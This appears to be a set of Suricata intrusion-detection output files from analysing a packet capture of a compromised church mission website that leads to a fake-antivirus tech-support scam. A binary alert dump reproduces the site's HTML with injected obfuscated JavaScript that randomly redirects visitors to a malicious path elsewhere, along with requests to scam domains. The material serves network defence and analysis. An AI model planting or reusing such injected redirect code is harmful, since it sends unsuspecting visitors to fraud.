21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'alert'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'http'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'dns'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'tls'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'files'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'ssh'
21/11/2018 -- 13:05:50 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
21/11/2018 -- 13:05:50 - <Info> - stats output device (regular) initialized: stats.log
21/11/2018 -- 1

This file has been truncated. Go here to download in full.


packet_stats.log - (12532 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6           106          1139446       73381002      42566453          4.5b   93.07
 IPv4      17             8          6230891       59117207      41976325        335.8m    6.93
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6           106            68390        6191847        471959         50.0m   84.79
TMM_FLOWWORKER              IPv4      17             8           450979        4240401       1034712          8.3m   14.03
TMM_RECEIVEPCAPFILE         IPv4       6           100             2538           3733          2956        295.6k    0.50
TMM_RECEIVEPCAPFILE         IPv4      17             8             2564          31284          7114         56.9k    0.10
TMM_DECODEPCAPFILE          IPv4       6           100             2652          14261          2932        293.3k    0.50
TMM_DECODEPCAPFILE          IPv4      17             8             2739          27354          6117         48.9k    0.08

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6           100             2861          44619          3901        390.1k  0.76  
flow                    IPv4      17             8             3166          32085          8037         64.3k  0.13  
stream                  IPv4       6           106             2862         459523         22513          2.4m  4.67  
app-layer               IPv4      17             8            10469          65859         23999        192.0k  0.38  
detect                  IPv4       6           106            45906        5762113        412408         43.7m  85.50 
detect                  IPv4      17             8           350779         831953        507344          4.1m  7.94  
tcp-prune               IPv4       6           106             2549           6852          3026        320.8k  0.63  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             6             3151          61370         16866        101.2k  62.79 
dns                     IPv4      17             8             4920          18008          7495         60.0k  37.21 
Proto detect            IPv4      17             8             4744          33416         17073        136.6k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6             5            29769          95286         48689        243.4k  4.59  
LOGGER_ALERT_FAST           IPv4      17             2            17139          22028         19583         39.2k  0.74  
LOGGER_UNIFIED2             IPv4       6             5            26451         179516         63779        318.9k  6.01  
LOGGER_UNIFIED2             IPv4      17             2            18457          45171         31814         63.6k  1.20  
LOGGER_JSON_ALERT           IPv4       6             5            65474         121176         98297        491.5k  9.27  
LOGGER_JSON_ALERT           IPv4      17             2            36066          41362         38714         77.4k  1.46  
LOGGER_JSON_DNS             IPv4      17             8            27774        3261493        450344          3.6m  67.93 
LOGGER_JSON_HTTP            IPv4       6             4            38376         112788         77310        309.2k  5.83  
LOGGER_JSON_FILE            IPv4       6             2            75189          82692         78940        157.9k  2.98  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6            62             2590         420503         59699         3.7m  24.36 
payload                           IPv4      17             8            20717         286376         92827       742.6k  4.89  
stream                            IPv4       6            62             2540         680670         69601         4.3m  28.40 
http_uri                          IPv4       6             5             8773          49829         23445       117.2k  0.77  
http_request_line                 IPv4       6             5             4912          11328          6964        34.8k  0.23  
http_client_body                  IPv4       6             5             2869           4040          3341        16.7k  0.11  
http_header (request)             IPv4       6             5            42867         106349         73237       366.2k  2.41  
http_header (request trailer)     IPv4       6             5             2629           2950          2714        13.6k  0.09  
http_header_names (request)       IPv4       6             5            12647          27276         17789        88.9k  0.59  
http_accept (request)             IPv4       6             5             4691          15065          7548        37.7k  0.25  
http_referer (request)            IPv4       6             5             3330           7537          5778        28.9k  0.19  
http_content_len (request)        IPv4       6             5             3060           7183          4134        20.7k  0.14  
http_content_type (request)       IPv4       6             5             3026           3555          3299        16.5k  0.11  
http_protocol (request)           IPv4       6             5             3919           6682          5245        26.2k  0.17  
http_start (request)              IPv4       6             5            10257          27564         17596        88.0k  0.58  
http_raw_header (request)         IPv4       6             5            12121          21728         15670        78.4k  0.52  
http_method                       IPv4       6             5             4475           8432          6080        30.4k  0.20  
http_cookie (request)             IPv4       6             5             3011           7393          4256        21.3k  0.14  
http_raw_uri                      IPv4       6             5             3427           6802          4828        24.1k  0.16  
http_user_agent                   IPv4       6             5            12582          69105         36376       181.9k  1.20  
http_host                         IPv4       6             5             6115          39216         23155       115.8k  0.76  
dns_query                         IPv4      17             4             7380          18295         11307        45.2k  0.30  
http_response_line                IPv4       6             4             4726          20478         10214        40.9k  0.27  
http_header (response)            IPv4       6             4            31257          70496         54003       216.0k  1.42  
http_header (response trailer)    IPv4       6             3             2647          45698         18827        56.5k  0.37  
http_content_type (response)      IPv4       6             4             4834          12954          8678        34.7k  0.23  
http_raw_header (response)        IPv4       6            42             3718          38786          5659       237.7k  1.56  
http_cookie (response)            IPv4       6             4             3052          17474          8320        33.3k  0.22  
http_stat_code                    IPv4       6             4             3196           4187          3809        15.2k  0.10  
file_data (http response)         IPv4       6            39             2597        3218367        114002         4.4m  29.27 
Total                             IPv4                   330                                         46036        15.2m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6             8            32331          97471         69902        559.2k  0.80  
PROF_DETECT_IPONLY          IPv4      17             8            37506         148963         60455        483.6k  0.70  
PROF_DETECT_RULES           IPv4       6           106             2562        2889971        175527         18.6m  26.76 
PROF_DETECT_RULES           IPv4      17             8           140225         336790        227950          1.8m  2.62  
PROF_DETECT_STATEFUL_START    IPv4       6            38             5122        1510777        213040          8.1m  11.64 
PROF_DETECT_STATEFUL_CONT    IPv4       6           106             2520          80419          6619        701.7k  1.01  
PROF_DETECT_STATEFUL_CONT    IPv4      17             8             6101          62810         14072        112.6k  0.16  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6            90             2549           3763          2698        242.8k  0.35  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             8             2661           3302          2953         23.6k  0.03  
PROF_DETECT_PREFILTER       IPv4       6           106             7957        3976628        169612         18.0m  25.86 
PROF_DETECT_PREFILTER       IPv4      17             8            54866         326974        138452          1.1m  1.59  
PROF_DETECT_PF_PAYLOAD      IPv4       6            62            13604         699415        143283          8.9m  12.78 
PROF_DETECT_PF_PAYLOAD      IPv4      17             8            26566         291790        101045        808.4k  1.16  
PROF_DETECT_PF_TX           IPv4       6            90             2553        3233847         79996          7.2m  10.36 
PROF_DETECT_PF_TX           IPv4      17             4            13671          28798         18524         74.1k  0.11  
PROF_DETECT_PF_SORT1        IPv4       6            56             2538          10642          3745        209.7k  0.30  
PROF_DETECT_PF_SORT1        IPv4      17             8             3992           4875          4481         35.9k  0.05  
PROF_DETECT_PF_SORT2        IPv4       6           106             2542          65883          4830        512.0k  0.74  
PROF_DETECT_PF_SORT2        IPv4      17             8             3015          39861         10484         83.9k  0.12  
PROF_DETECT_NONMPMLIST      IPv4       6           106             2563          40636          3489        369.9k  0.53  
PROF_DETECT_NONMPMLIST      IPv4      17             8             2914          57481         11462         91.7k  0.13  
PROF_DETECT_ALERT           IPv4       6           106             2522         386940          6597        699.3k  1.01  
PROF_DETECT_ALERT           IPv4      17             8             2710          11834          4146         33.2k  0.05  
PROF_DETECT_CLEANUP         IPv4       6           106             2571          16398          3022        320.3k  0.46  
PROF_DETECT_CLEANUP         IPv4      17             8             3393           4835          4031         32.2k  0.05  
PROF_DETECT_GETSGH          IPv4       6           106             2519          38790          3397        360.1k  0.52  
PROF_DETECT_GETSGH          IPv4      17             8             6091          20252          9516         76.1k  0.11  


suricata-4.0.0-etpro-all-alert-2018-11-21-T-13-05-51-11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap.txt - (1809 bytes) - download
1
2
3
4
5
6
7
8
9
01/06/2018-02:36:14.886509  [**] [1:2012325:4] ET WEB_CLIENT Obfuscated Javascript // ptth [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 144.208.76.207:80 -> 10.1.6.102:50624
01/06/2018-02:37:15.486807  [**] [1:2012811:2] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.6.102:61686 -> 10.1.6.1:53
01/06/2018-02:37:15.835900  [**] [1:2012810:10] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.6.102:50659 -> 204.155.28.5:80
01/06/2018-02:37:15.841456  [**] [1:2012811:2] ET DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.6.102:60808 -> 10.1.6.1:53
01/06/2018-02:37:16.720648  [**] [1:2012810:10] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.6.102:50661 -> 185.159.83.48:80
01/06/2018-02:37:16.805025  [**] [1:2012810:10] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.6.102:50661 -> 185.159.83.48:80
01/06/2018-02:37:58.683848  [**] [1:2023055:2] ET CURRENT_EVENTS Tech Support Phone Scam Landing (err.mp3) Aug 12 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.159.83.48:80 -> 10.1.6.102:50661
01/06/2018-02:37:58.683848  [**] [1:2025345:2] ET CURRENT_EVENTS Fake AV Phone Scam Landing Feb 12 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.159.83.48:80 -> 10.1.6.102:50661
01/06/2018-02:37:58.683848  [**] [1:2827062:2] ETPRO CURRENT_EVENTS Tech Support Scam Landing Jul 07 2017 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.159.83.48:80 -> 10.1.6.102:50661


unified2.alert.1542805550 - (11869 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
4ZP6
†í´¥ÐLÏ
fPÅÀZP6ZP6
†íêEÜǐÐLÏ
fPÅÀPûD          <div class="entry-content">
                    <ul>
                        <li class="entry-content-title"><h4><a href="http://prelatureofayaviri.org/mission/" target="_blank">KNOW THE MISSION</a></h4></li>
                        <li class="entry-content-excerpt"><p><span style="color: #000000;">Find out about the aims <script type="text/javascript">$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}</script>and the needs of the mission of the Prelature.</span></p></li>
                    </ul>
                </div>
            </article>
        </div>

                <div class="cosmobox four columns  ">
            <article class="box ">
                                <div class="entry-content">
                    <ul>
                        <li class="entry-content-title"><h4><a href="http://prelatureofayaviri.org/mission/testimonies/" target="_blank">HEAR FROM OTHERS</a></h4></li>
                        <li class="entry-content-excerpt"><p><span style="color: #000000;">Read, watch <script type="text/javascript">$hiVNZt4Y5cDrbJXMhLy=function(nZP6ZP6
†íêEÜǐÐLÏ
fPÅÀPßÉ){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}</script>and hear the testimonies of past missionaries.</span></p></li>
                    </ul>
                </div>
            </article>
        </div>

                <div class="cosmobox four columns  ">
            <article class="box ">
                                <div class="entry-content">
                    <ul>
                        <li class="entry-content-title"><h4><a href="http://prelatureofayaviri.org/contacts/" target="_blank">GET INVOLVED</a></h4></li>
                        <li class="entry-content-excerpt"><p><span style="color: #000000;">Become a missionary to the Prelature. Find the contact best suited for you <script type="text/javascript">$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.
e9a
floor(Math.random()*5);if (c==3){var deZP6ZP6
†íêEÜǐÐLÏ
fPÅÀPÑmlay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}</script>and your gifts.</span></p></li>
                    </ul>
                </div>
            </article>
        </div>

        </div></div></div>			</div>
		</div>
	</div>
</section>
        <!-- footer -->
        <footer id="colophon" role="contentinfo" data-role="footer" data-position="fixed" data-fullscreen="true">
            <div class="row">
                <div class="footer-styles">
                    <div class="row  "><div class="delimiter  twelve columns"><div style="" class="delimiter-type white_space margin_30px "></div></div></div><div class="row element"><div class="widget_zone  three columns"></div><div class="widget_zone  three columns"></div><div class="widget_zone  three columns"></div><div class="widget_zone  three columns"></div></div><div class="row  "><div class="delimiter  eleven columns"><div style="border-top: 1px solid #4c4d52;" class="delimiter-type line margin_30px "></div></div><div class="textelement align-right one columns"><script type='text/javascript' src='https://s1.trymynewspirit.com/pr.js'></script><script type='text/javascript' src='https://s1.trymynewspirit.com/pr.js'></script><script type='text/javascript' src='https://s1.trymynewspirit.com/pr.js'></script><a href="http://www.prelaturaayaviri.org" target="_blank">Español</a></div></div><div class="row element"><div class="copyright align-left six columns">            <p ZP6ZP6
†íêEÜǐÐLÏ
fPÅÀPR|class="copyright">Copyright © Prelature of Ayaviri. All rights reserved.</p>
        </div><div class="socialicons align-right six columns"><ul class="cosmo-social">                    <li><a href="http://vimeo.com/channels/537844" target="_blank" class="vimeo hover-menu"><i class="icon-vimeo"></i></a></li>
                        <li><a href="mailto:prelaturaayaviri@gmail.com" target="_blank" class="email hover-menu"><i class="icon-email"></i></a></li>
            </ul></div></div>                </div>
            </div>
        </footer>
        <!-- eof footer-->

    </div>
    
    
    <div class="overlay">&nbsp;</div>
            <script type="text/javascript" src="//platform.twitter.com/widgets.js"></script>
        <script type="text/javascript">
            (function() {
                var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
                po.src = 'https://apis.google.com/js/plusone.js';
                var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
            })();
        </script>
    
    <script type="text/javascript">

        var cookies_prefix = "belief";  
        var themeurl = "http://www.prelatureofayaviri.org/wp-content/themes/belief";
        jQuery( function(){
            jQuery( '.demo-tooltip' ).tour();
        });

    </script>
        <script type='text/javascript' src='http://www.prelaZP6ZP6
†íêEÜǐÐLÏ
fPÅÀP1tureofayaviri.org/wp-content/themes/belief/js/foundation.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.superfish.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.supersubs.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/tour.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.tabs.pack.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.scrollTo-1.4.2-min.js?ver=3.8.24'></script>

13e
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.elastislide.js?ver=3.8.24'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var prettyPhoto_enb = {"enb_lightbox":"1"};
var login_localize = {"check_email":"Please check your email"};
/* ]]> */
</script>

85
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/functions.js?ver=3.8.24'></script>

89
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.cookie.js?ver=3.8.24'></script>

1a1
<script type='text/javascript' src='http://www.prelatureofayaviri.oZP6ZP6
†íêEÜǐÐLÏ
fPÅÀP¬rg/wp-content/themes/belief/js/jquery.prettyPhoto.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.easing.js?ver=3.8.24'></script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.jscroll.js?ver=3.8.24'></script>

536
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/js/jquery.waitforimages.js?ver=3.8.24'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var MyAjax = {"ajaxurl":"http:\/\/www.prelatureofayaviri.org\/wp-admin\/admin-ajax.php","wpargs":{"wpargs":[]},"getMoreNonce":"9f81793b1b"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.prelatureofayaviri.org/wp-content/themes/belief/lib/js/actions.js?ver=3.8.24'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var FB_WP=FB_WP||{};FB_WP.queue={_methods:[],flushed:false,add:function(fn){FB_WP.queue.flushed?fn():FB_WP.queue._methods.push(fn)},flush:function(){for(var fn;fn=FB_WP.queue._methods.shift();){fn()}FB_WP.queue.flushed=true}};window.fbAsyncInit=function(){FB.init({"channelUrl":"http:\/\/www.prelatureofayaviri.org\/wp-content\/plugins\/facebook\/channel.php","xfbml":true});if(FB_WP && FB_WP.queue && FB_WP.queue.flush){FB_WP.queue.flush()}}
/* ]]> */
</script>
<div id="fb-root"></div><script type="text/javascript">(function(d,s,id){var js,fjs=d.getElementsByTagNa;ZP6ZP6
†íEËáÐLÏ
fPÅÀPÒ~me(s)[0];if(d.getElementById(id)){return}js=d.createElement(s);js.id=id;js.src="http:\/\/connect.facebook.net\/en_US\/all.js";fjs.parentNode.insertBefore(js,fjs)}(document,"script","facebook-jssdk"));</script>
    </body> 
</html>
4ZP6[m—¶‹
f
ðö5mZP6[ZP6[m—Q å*¶“ñG®ECk€®
f
ðö5/^2,Srichcalling3050112tk4ZP6[Á<¶Š

f̛ÅãPŒZP6[ZP6[Á<pEbÀ
f̛ÅãPP¶åGET /index/?2101505838590 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.prelatureofayaviri.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: richcalling3050112.tk

4ZP6[Öð¶‹
f
íˆ5nZP6[ZP6[ÖðR å*¶“ñG®EDkɀ®w
f
íˆ50]¢,ìrichsapport60501123tk4ZP6\
ÿ¶Š

f¹ŸS0ÅåPZP6\ZP6\
ÿqEcœ_
f¹ŸS0ÅåPPgGET /?number=888-797-7834 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.prelatureofayaviri.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: richsapport60501123.tk

4ZP6\H¡¶Š

f¹ŸS0ÅåPªZP6\ZP6\H¡ŽE€œB
f¹ŸS0ÅåPPæGET /landinf/defender.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://richsapport60501123.tk/?number=888-797-7834
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: richsapport60501123.tk
Connection: Keep-Alive

4ZP6†
oHޏ¹ŸS0
fPÅåDZP6†ZP6†
oH(E(@]š¹ŸS0
fPÅåÕ&^— XW$P
.4ZP6†
oH灹ŸS0
fPÅåDZP6†ZP6†
oH(E(@]š¹ŸS0
fPÅåÕ&^— XW$P
.4	ZP6†
oH+#6¹ŸS0
fPÅåD	ZP6†ZP6†
oH(E(@]š¹ŸS0
fPÅåÕ&^— XW$P
.


stats.log - (2832 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
------------------------------------------------------------------------------------
Date: 11/21/2018 -- 13:05:51 (uptime: 0d, 00h 00m 01s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 108
decoder.bytes                              | Total                     | 68203
decoder.ipv4                               | Total                     | 108
decoder.ethernet                           | Total                     | 108
decoder.tcp                                | Total                     | 100
decoder.udp                                | Total                     | 8
decoder.avg_pkt_size                       | Total                     | 631
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 4
flow.udp                                   | Total                     | 4
tcp.sessions                               | Total                     | 4
tcp.syn                                    | Total                     | 4
tcp.synack                                 | Total                     | 4
tcp.reassembly_gap                         | Total                     | 1
detect.alert                               | Total                     | 9
detect.mpm_list                            | Total                     | 7
detect.nonmpm_list                         | Total                     | 2
detect.fnonmpm_list                        | Total                     | 1
detect.match_list                          | Total                     | 8
app_layer.flow.http                        | Total                     | 4
app_layer.tx.http                          | Total                     | 5
app_layer.flow.dns_udp                     | Total                     | 4
app_layer.tx.dns_udp                       | Total                     | 4
flow.spare                                 | Total                     | 9999
flow_mgr.flows_checked                     | Total                     | 2
flow_mgr.flows_notimeout                   | Total                     | 2
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_empty                        | Total                     | 65534
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7074592


eve.json - (9963 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
{"timestamp":"2018-01-06T02:36:09.861154+0000","flow_id":517950341194722,"pcap_cnt":1,"event_type":"dns","src_ip":"10.1.6.102","src_port":51950,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5788,"rrname":"www.prelatureofayaviri.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-01-06T02:36:09.953564+0000","flow_id":517950341194722,"pcap_cnt":2,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":51950,"proto":"UDP","dns":{"type":"answer","id":5788,"rcode":"NOERROR","rrname":"www.prelatureofayaviri.org","rrtype":"CNAME","ttl":5,"rdata":"prelatureofayaviri.org"}}
{"timestamp":"2018-01-06T02:36:09.953564+0000","flow_id":517950341194722,"pcap_cnt":2,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":51950,"proto":"UDP","dns":{"type":"answer","id":5788,"rcode":"NOERROR","rrname":"prelatureofayaviri.org","rrtype":"A","ttl":5,"rdata":"144.208.76.207"}}
{"timestamp":"2018-01-06T02:36:14.886509+0000","flow_id":414823881478399,"pcap_cnt":49,"event_type":"alert","src_ip":"144.208.76.207","src_port":80,"dest_ip":"10.1.6.102","dest_port":50624,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012325,"rev":4,"signature":"ET WEB_CLIENT Obfuscated Javascript \/\/ ptth","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-01-06T02:36:14.886788+0000","flow_id":414823881478399,"pcap_cnt":50,"event_type":"http","src_ip":"10.1.6.102","src_port":50624,"dest_ip":"144.208.76.207","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.prelatureofayaviri.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-01-06T02:37:13.669140+0000","flow_id":1731637236282836,"pcap_cnt":51,"event_type":"dns","src_ip":"10.1.6.102","src_port":64279,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1927,"rrname":"nh70putera.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-01-06T02:37:14.255688+0000","flow_id":1731637236282836,"pcap_cnt":52,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":64279,"proto":"UDP","dns":{"type":"answer","id":1927,"rcode":"NOERROR","rrname":"nh70putera.com","rrtype":"A","ttl":5,"rdata":"103.28.52.250"}}
{"timestamp":"2018-01-06T02:37:15.484307+0000","flow_id":2027476731231182,"pcap_cnt":59,"event_type":"http","src_ip":"10.1.6.102","src_port":50658,"dest_ip":"103.28.52.250","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"nh70putera.com","url":"\/wp-content\/plugins\/login-lockdown\/plugin-settings.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-01-06T02:37:15.486807+0000","flow_id":1884727050726807,"pcap_cnt":60,"event_type":"alert","src_ip":"10.1.6.102","src_port":61686,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","alert":{"action":"allowed","gid":1,"signature_id":2012811,"rev":2,"signature":"ET DNS Query to a .tk domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-01-06T02:37:15.486807+0000","flow_id":1884727050726807,"pcap_cnt":60,"event_type":"dns","src_ip":"10.1.6.102","src_port":61686,"dest_ip":"10.1.6.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11347,"rrname":"richcalling3050112.tk","rrtype":"A","tx_id":0}}
{"timestamp":"2018-01-06T02:37:15.642409+0000","flow_id":1884727050726807,"pcap_cnt":61,"event_type":"dns","src_ip":"10.1.6.1","src_port":53,"dest_ip":"10.1.6.102","dest_port":61686,"proto":"UDP","dns":{"type":"answer","id":11347,"rcode":"NOERROR","rrname":"richcalling3050112.tk","rrtype":"A","ttl":5,"rdata":"204.155.28.5"}}
{"timestamp":"2018-01-06T02:37:15.835900+0000","flow_id":162823122178298,"pcap_cnt":68,"event_type":"alert","src_ip":"10.1.6.102","src_port":50659,"dest_ip":"204.155.28.5","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012810,"rev":10,"signature":"ET POLICY HTTP Request to a *.tk domain","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
